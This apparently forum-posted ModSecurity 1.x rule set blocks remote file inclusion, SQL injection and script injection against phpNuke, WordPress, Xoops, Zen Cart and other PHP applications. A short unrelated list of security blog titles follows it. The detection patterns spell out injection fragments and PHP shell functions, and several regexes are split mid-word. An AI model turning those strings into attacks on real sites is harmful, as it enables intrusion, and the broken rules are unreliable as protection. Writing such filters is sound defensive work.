SecFilterSelective REQUEST_URI "/phpmyadmin/index\.php\?pma_username=*&pma_password=*&server=.*<=.*&convcharset=.*((javascript|script|about|applet|activex|chrome)*\>|(http|https|ftp)\:/)"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-phpnuke.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective REQUEST_URI "/modules\.php" "chain,rev:1,id:HG2008012301,deny,severity:5,msg:'phpNuke SQLi'"
SecFilterSelective ARG_sid "(union|select|concat|radminsuper)"
SecFilterSelective ARG_nuke_bb_root_path "(\.\./\.\.|/|(http|https|ftp)\:/)" "rev:1,id:HG2007102501,deny,severity:5,msg:'phpNuke RFI'"
SecFilterSelective REQUEST_URI "/modules\.php\?" "chain,rev:1,id:HG2007101855,deny,severity:5,msg:'phpNuke RFI'"
SecFilterSelective REQUEST_URI "ACCEPT_FILE[?]=(\.\./\.\.|/|(http|https|ftp)\:/)"
SecFilterSelective REQUEST_URI "(/\?module=PNphpBB2|/index\.php\?)" "chain,rev:1,id:HG2007101855,deny,severity:5,msg:'phpNuke SQL'"
SecFilterSelective REQUEST_URI "(concat|user_password|union select|pn_phpbb_users)"
SecFilterSelective REQUEST_URI "/modules\.php\?" "chain,rev:1,id:HG2007101856,deny,severity:5,msg:'phpNuke SQL'"
SecFilterSelective ARG_url "(concat|user_password|union select|pn_phpbb_users|insert into)"
SecFilterSelective REQUEST_URI "/modules/vwar/convert/mvcw_conver\.php\?" "chain,rev:1,id:HG2007101850,deny,severity:5,msg:'phpNuke RFI'"
SecFilterSelective REQUEST_URI "vwar_root=(\.\./\.\.|/|(http|https|ftp)\:/)"
SecFilterSelective REQUEST_URI "/(modules/Web_Links/index|modules)\.php\?" "chain,rev:1,id:HG2007101860,deny,severity:5,msg:'phpNuke SQL'"
SecFilterSelective ARG_l_op "(viewlinkcomments|viewlinkeditorial|ratelink)" chain
SecFilterSelective ARG_lid "(concat|user_password|union select|pn_phpbb_users|insert into)"
SecFilterSelective REQUEST_URI "/modules/vwar/extra/online\.php\?" "chain,rev:1,id:HG2007101859,deny,severity:5,msg:'phpNuke RFI Virtual War'"
SecFilterSelective REQUEST_URI "(concat|user_password|union select|pn_phpbb_users|insert into|union.+select|vwar_member/|nuke_users/)"
SecFilterSelective REQUEST_URI "/iframe\.php\?" "chain,rev:1,id:HG2007101851,deny,severity:5,msg:'phpNuke iFrame RFI'"
SecFilterSelective REQUEST_URI "file=(\.\./\.\.|/|(http|https|ftp)\:/)"
SecFilterSelective REQUEST_URI "/gallery/displayCategory\.php\?" "chain,rev:1,id:HG2007101852,deny,severity:5,msg:'phpNuke RFI'"
SecFilterSelective ARG_basepath "(\.\./\.\.|/|(http|https|ftp)\:/)"
SecFilterSelective REQUEST_URI "/master\.php\?" "chain,rev:1,id:HG2007101853,deny,severity:5,msg:'phpNuke RFI'"
SecFilterSelective ARG_root_path "(\.\./\.\.|/|(http|https|ftp)\:/)"
SecFilterSelective REQUEST_URI "/modules/vWar_Account/includes/functions_common\.php\?" "chain,rev:1,id:HG2007101854,deny,severity:5,msg:'phpNuke RFI'"
SecFilterSelective ARG_vwar_root2 "(\.\./\.\.|/|(http|https|ftp)\:/)"
SecFilterSelective REQUEST_URI "/index\.php.*func=*(\.\./|(http|https|ftp)\:/)"
SecFilterSelective REQUEST_URI "/modules\.php\?op=modload&name=Messages&file=readpmsg&start=*(delete|insert|drop|do|alter|replace|truncate|update|create|rename)"
SecFilterSelective REQUEST_URI "modules/Downloads/dl-viewdownload\.php" chain
SecFilterSelective ARG_show "(select|grant|delete|insert|drop|do|alter|replace|truncate|update|create|re
name|describe)[[:space:]]+[A-Z|a-z|0-9|\*| |,]+[[:space:]]"
SecFilterSelective REQUEST_URI "/modules/pn_bbcode/pnincludes/contrib/example\.php"
SecFilterSelective REQUEST_URI "/modules\.php\?*name=*\<*(script|about|applet|activex|chrome)*\>"
SecFilterSelective REQUEST_URI "/modules\.php\?op=modload&name=News&file=article&sid=*\<*(script|about|applet|activex|chrome)*\>"
SecFilterSelective REQUEST_URI "/modules\.php\?name=Search&type=comments&query=.*&instory=.*UNION.*SELECT.*pwd.*FROM.*nuke_authors"
SecFilterSelective REQUEST_URI "/modules\.php\?*name=Search*instory="
SecFilterSelective REQUEST_URI "/modules\.php\?*name=(Search|Web_Links).*\'"
SecFilterSelective REQUEST_URI "/modules\.php\?*name=<[[:space:]]*script"
SecFilterSelective REQUEST_URI "/modules\.php\?name=Bookmarks\&file=(del_cat\&catname|del_mark\&markname|edit_cat\&catname|edit_cat\&catcomment|marks\&catname|uploadbookmarks\&category)=(<[[:space:]]*script|(http|https|ftp)\:/)"
SecFilterSelective REQUEST_URI "/modules\.php\?name=Bookmarks\&file=marks\&catname=.*\&category=.*/\*\*/(union|select|delete|insert)"
SecFilterSelective REQUEST_URI "/index\.php\?" chain
SecFilterSelective ARG_file "(\.\./\.\.|(http|https|ftp)\:/)"
SecFilterSelective REQUEST_URI "/modules\.php\?*name=Search*instory="
SecFilterSelective REQUEST_URI "/modules\.php\?*name=Forums.*file=viewtopic*/forum=.*\'/"
SecFilterSelective REQUEST_URI "/banners\.php\?op=EmailStats&name=.*&bid=.*((javascript|script|about|applet|activex|chrome)*\>|(http|https|ftp)\:/)"
SecFilterSelective REQUEST_URI "/modules\.php\?name=.*((javascript|script|about|applet|activex|chrome)*\>|(http|https|ftp)\:/)"
SecFilterSelective REQUEST_URI "/modules\.php\?name=Search&author=.*&topic=.*&min.*((javascript|script|about|applet|activex|chrome)*\>|(http|https|ftp)\:/)"
SecFilterSelective REQUEST_URI "/modules\.php\?name=FAQ&.*=.*&id_cat=.*&categories=.*((javascript|script|about|applet|activex|chrome)*\>|(http|https|ftp)\:/)"
SecFilterSelective REQUEST_URI "/modules\.php\?op=EmailStats&login=.*&cid=.*&bid=.*((javascript|script|about|applet|activex|chrome)*\>|(http|https|ftp)\:/)"
SecFilterSelective REQUEST_URI "/modules\.php\?name=Encyclopedia&file=.*&op=.*&eid.*1&ltr=.*((javascript|script|about|applet|activex|chrome)*\>|(http|https|ftp)\:/)"
SecFilterSelective ARG_nuke_bb_root_path "(\.\.|/|http|https|ftp)\:" "rev:1,id:HG2007102701,severity:5,deny:503,msg:'phpNuke RFI'"
SecFilterSelective REQUEST_URI "/modules\.php\?" "chain,rev:1,id:HG2007102702,severity:5,deny:503,msg:'phpNuke RFI'"
SecFilterSelective ARG_name "(\.\.|/|http|https|ftp)\:"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-phpprojeckt.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective REQUEST_URI "/(cm_navigation|cm_navigation-33|cm_summary)\.inc\.php\?" "chain,rev:1,id:HG2007101901,deny,severity:5,msg:'phpProjeckt RFI'"
SecFilterSelective REQUEST_URI "path_pre=(\.\./\.\.|/|(http|https|ftp)\:/)"
SecFilterSelective REQUEST_URI "/lib/(dbman_filter\.inc|specialdays)\.php\?" "chain,rev:1,id:HG2007101902,deny,severity:5,msg:'phpProjeckt RFI'"
SecFilterSelective REQUEST_URI "path_pre=(\.\./\.\.|/|(http|https|ftp)\:/)"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-phprealestate.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective REQUEST_URI "/fullnews\.php\?" "chain,rev:1,id:HG20071211205,deny,severity:5,msg:'phpRealEstate RFI'"
SecFilterSelective ARG_id "((union|select|concat|username|password).* from )|(http|ftp|\.\.)\:"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-phpsurveyor.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective REQUEST_URI "/admin/classes/pear/OLE/(PPS/File|PPS/Root|PPS)\.php\?" "chain,rev:1,id:HG2007101905,deny,severity:5,msg:'phpSurveyor RFI'"
SecFilterSelective ARG_homedir "(\.\./\.\.|/|(http|https|ftp)\:/)"
SecFilterSelective REQUEST_URI "/admin/classes/pear/OLE/Spreadsheet/Excel/(Writer/Worksheet|Writer/Parser|Writer/Workbook|Writer/Format|Writer/BIFFwriter)\.php\?" "chain,rev:1,id:HG2007101906,deny,severity:5,msg:'phpSurveyor RFI'"
SecFilterSelective ARG_homedir "(\.\./\.\.|/|(http|https|ftp)\:/)"
SecFilterSelective REQUEST_URI "/admin/" "chain,rev:1,id:HG2007110101,deny,severity:5,msg:'phpSurveyor SQLi'"
SecFilterSelective "ARG_sid|ARG_start|ARG_id|ARG_lid" "(alter|create|delete|describe|drop|grant|insert|rename|replace|select|trunc
ate|update)[[:space:]]+[A-Z|a-z|0-9|*| |,]+[[:space:]](from|into|table|database|index|view)"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-phpthumb.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective ARG_album "(\.\./\.\.|/|(http|https|ftp)\:/)" "rev:1,id:HG2008030101,deny,severity:5,msg:'phpThumb album RFI'"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-roundcube.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@


# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-soholaunch.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective "ARG__SESSION[docroot_path]" "(\.\./\.\.|/|(http|https|ftp)\:/)" "rev:1,id:HG2007101895,deny,severity:5,msg:'SoHoAdmin RFI'"
SecFilterSelective REQUEST_URI "/login\.php\?" "chain,rev:1,id:HG2007071202,deny,severity:5,msg:'RFI: SohoAdmin CVE-2006-5236'"
SecFilterSelective REQUEST_URI "_SESSION\[docroot_path\]=(\.\.|/|http|https|ftp)\:"
SecFilterSelective REQUEST_URI "/login\.php\?" "chain,rev:1,id:HG2007071202,deny,severity:5,msg:'RFI: SohoAdmin CVE-2006-5236'"
SecFilterSelective REQUEST_URI "_SESSION\[docroot_path\]=(http|https|ftp)\:"
SecFilterSelective REQUEST_URI "/index\.php\?page=(http|https|ftp)\:" "rev:1,id:HG2007071801,deny,severity:5,msg:'RFI: CVE-2006-5590 ArticleBeach'"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-squirrelmail.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@


# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-tinywebgallery.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective REQUEST_URI "/examples/image\.php\?" chain
SecFilterSelective REQUEST_URI "=(\.\./\.\.|/|(http|https|ftp)\:/)"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-topsites.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective REQUEST_URI "/join\.php\?" "chain,rev:1,id:HG2007071101,severity:5,msg:'RFI: TopSites 4.x'"
SecFilterSelective REQUEST_URI "CONFIG\[path\]=(http|https|ftp)\:/"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-vbulletin.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective REQUEST_URI "/joinrequests\.php\?" chain
SecFilterSelective REQUEST_URI "(select|grant|delete|insert|drop|alter|replace|truncate|update|create|renam
e|describe)[[:space:]]+[A-Z|a-z|0-9]"
SecFilterSelective REQUEST_URI "/admincp/(admincalendar|email|help|language|phrase|user|usertitle|usertools)\.php\?" chain
SecFilterSelective REQUEST_URI "(select|grant|delete|insert|drop|alter|replace|truncate|update|create|renam
e|describe)[[:space:]]+[A-Z|a-z|0-9]"
SecFilterSelective REQUEST_URI "/modcp/announcement\.php\?" chain
SecFilterSelective REQUEST_URI "(select|grant|delete|insert|drop|alter|replace|truncate|update|create|renam
e|describe)[[:space:]]+[A-Z|a-z|0-9]"
SecFilterSelective REQUEST_URI "/calendar\.php\?" chain
SecFilterSelective REQUEST_URI "comma=\x22;"
SecFilterSelective REQUEST_URI "/forumdisplay\.php?[^\r\n]*comma=[^\r\n\x26]*system\x28.*\x29/Ui"
SecFilterSelective REQUEST_URI "/forumdisplay\.php\?" chain
SecFilter "\.system\(.+\)\."
SecFilterSelective REQUEST_URI "/forumdisplay\.php\?*comma="

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-webcalendar.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective REQUEST_URI "/day\.php\?" "chain,rev:1,deny,msg:'RFI: WebCalendar'"
SecFilterSelective ARG_date "(\.\./\.\.|(http|https|ftp)\:/):"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-wordpress.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective ARG_wpPATH "(\.\.|http|https|ftp)\:" "rev:1,id:HG2008012403,deny,severity:5,msg:'RFI: WP: WordTube RFI'"
SecFilterSelective REQUEST_URI "/index\.php\?" "chain,id:HG2007121203,severity:5,msg:'SQLi: WP < 2.3.1'"
SecFilterSelective ARG_s "(select.*wp_users|select.*user_pass)"
SecFilterSelective ARG_bkpwp_plugin_path "(\.\.|/|http|https|ftp)\:" "rev:1,id:HG2007120501,deny,severity:5,msg:'RFI: WP: BackupWordPress Plugin'"
SecFilterSelective REQUEST_URI "/wp-trackback\.php" "chain,id:HG2008011330,deny,severity:5,msg:'SQLi: WP'"
SecFilterSelective ARG_tb_id "(select|grant|delete|insert|drop|do|alter|replace|truncate|update|create|re
name|describe)[[:space:]]+[A-Z|a-z|0-9|\*| ]+[[:space:]](from|into|table|database|index|view)"
SecFilterSelective REQUEST_URI "/index\.php\?" "chain,id:HG2008011331,deny,severity:5,msg:'SQLi: WP'"
SecFilterSelective ARG_cat= "(select|grant|delete|insert|drop|do|alter|replace|truncate|update|create|re
name|describe)[[:space:]]+[A-Z|a-z|0-9|\*| |,]+[[:space:]](from|into|table|database|index|view)"
SecFilterSelective REQUEST_URI "/wordpress/" "chain,id:HG2008011332,deny,severity:5,msg:'Wordpress vulrenability'"
SecFilterSelective ARG_cat "!^[0-9]*$"
SecFilterSelective ARG_cache_lastpostdate "<\?php" "id:HG2008011334,deny,severity:5,msg:'PHPi: WP'"
SecFilterSelective REQUEST_URI "/index\.php" "chain,id:HG2008011333,deny,severity:5,msg:'SQLi: WP'"
SecFilterSelective ARG_poll|ARG_category|ARG_ctg "((select|grant|delete|insert|drop|alter|replace|truncate|update|create|rena
me|describe)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]|\'|UNION.*SELECT.*INTO.*FROM)"
SecFilterSelective REQUEST_URI "/mygallerybrowser\.php\?" "chain,rev:1,id:HG2007071802,deny,severity:5,msg:'RFI: CVE-2007-2426 WordPress'"
SecFilterSelective ARG_myPath "(\.\.|/|http|https|ftp)\:"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-xmlrpc.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective THE_REQUEST "(/xmlrpc|.*xmlrpc_services)\.php" "chain,rev:1,id:HG2008011340,deny,msg:'XML rpc exploit'"
SecFilter "(\<xml|\<.*xml)" chain
SecFilter "(echo( |\(|\').*\;|chr|fwrite|fopen|system|echr|passthru|popen|proc_open|shell_exec|exec|pro
c_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_ter
minate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo)\(.*\)\;"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-xoops.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective REQUEST_URI "/init_basic\.php\?" "chain,rev:1,id:HG2008011002,deny,severity:5,msg:'Xoops GALLERY_BASEDIR RFI'"
SecFilterSelective ARG_GALLERY_BASEDIR "(\.\./\.\.|/|(http|https|ftp)\:/):"
SecFilterSelective REQUEST_URI "/spaw_control\.class\.php\?" "chain,rev:1,id:HG_RFI_SPAW01,deny,severity:5,msg:'Xoops/SPAW: RFI'"
SecFilterSelective REQUEST_URI "spaw_root=(\.\./\.\.|/|(http|https|ftp)\:/):"
SecFilterSelective "ARG_xoopsConfig[root_path]" "(\.\./\.\.|/|(http|https|ftp)\:/):" "rev:1,id:HG_RFI_XoopsConfig,deny,severity:5,msg:'Xoops RFI'"
SecFilterSelective ARG_sid "(\.\./\.\.|/|xoops_users|(http|https|ftp)\:/):" "rev:1,id:HG_RFI_XoopsSID,deny,severity:5,msg:'Xoops RFI/SQL: SID var'"
SecFilterSelective REQUEST_URI "/xfsection/modify\.php\?" "chain,rev:1,id:HG2007101810,deny,severity:5,msg:'Xoops RFI: XFSection'"
SecFilterSelective ARG_dir_module "(\.\./\.\.|/|(http|https|ftp)\:/):"
SecFilterSelective REQUEST_URI "/modules/(camportail/show|core/viewcat|debaser/genre|ecal/display|flashgames/game|friendfinder/view|kshop/product_details|library/viewcat|lykos_reviews/index|myAds/index|myalbum/viewcat|popnupblog/index|repository/viewcat|rmgallery/categos|wflinks/viewcat|rha7downloads/visit|tinyevent/index|wfquotes/index|wfsnippets/index|wfsection/print|xfsection/print|zmagazine/print)\.php\?" "chain,rev:1,id:HG2007101815,deny,severity:5,msg:'Xoops SQL'"
SecFilterSelective REQUEST_URI "(delete[[:space:]]+from|insert[[:space:]]+into|select.+from|union|xoops_use
rs)"
SecFilterSelective REQUEST_URI "/modules/tsdisplay4xoops/blocks/tsdisplay4xoops_block2\.php\?" "chain,rev:1,id:HG2007101816,deny,severity:5,msg:'Xoops RFI'"
SecFilterSelective ARG_xoops_url "(\.\./\.\.|/|(http|https|ftp)\:/):"
SecFilterSelective REQUEST_URI "/modules/jobs/index\.php\?" "chain,rev:1,id:HG2007101817,deny,severity:5,msg:'Xoops RFI'"
SecFilterSelective REQUEST_URI "(delete[[:space:]]+from|insert[[:space:]]+into|select.+from|union|xoops_use
rs)"
SecFilterSelective REQUEST_URI "(/xmlrpc|.*xmlrpc_services)\.php" "chain,rev:1,id:HG_XOOPS_RPCXML,deny,severity:5,msg:'Xoops XMLRPC SQL'"
SecFilterSelective POST_PAYLOAD "<methodName>blogger\.getUsersBlogs</methodName>" chain
SecFilter ".*\' AND ascii\(substring\(pass"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-zencart.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective REQUEST_URI "/admin/(password_forgotten|login)\.php\?" "chain,rev:1,id:HG2007071807,deny,severity:5,msg:'Zen Cart: SQL Injection'"
SecFilterSelective REQUEST_URI "(union select|into outfile|from admin)"
SecFilterSelective ARG_[loadFile] "(\.\./\.\.|/|(http|https|ftp)\:/)" "rev:1,id:HG20071809,deny,severity:5,msg:'Zen Cart [loadFile] RFI'"
SecFilterSelective REQUEST_URI "/ipn\.php\?cmd=" "rev:1,id:HG2008011335,deny,severity:5,msg:'Zen Cart Exploit'"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-zz.exclusions.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

<LocationMatch "/rss.php?url=*p=.*">
SecFilterRemove 390144
</LocationMatch>
SecFilterSelective REMOTE_ADDR "^127\.0\.0\.1$" nolog,allow
SecFilterSelective REQUEST_URI "/whm-server-status" nolog,allow
<LocationMatch "/store/squirrelcart/paypal_ipn.php">
SecFilterRemove HG2007082202
</LocationMatch>
<LocationMatch "/wp-content/plugins/addrecords.php">
SecFilterRemove 390144
SecFilterRemove 390145
</LocationMatch>
<LocationMatch /item.php>
SecFilterRemove 390144
SecFilterRemove 390145
</LocationMatch>


[/CODE]

Black.hat

Saturday, November 27, 2010

CVE-2010-3654

Microtik (os / router)

Collision for hash functions

Hiding Shellcode in Plain Sight

Friday, November 26, 2010

hash

IDA tut's

Disassembling Code - IDA Pro And SoftICE

Hacker Debugging Uncovered

Debugging Applications For Microsoft. NET And Microsoft Windows

ArtOfDisassembly

Hacker Disassembling Uncovered

Reversing Secrets of Reverse Engineering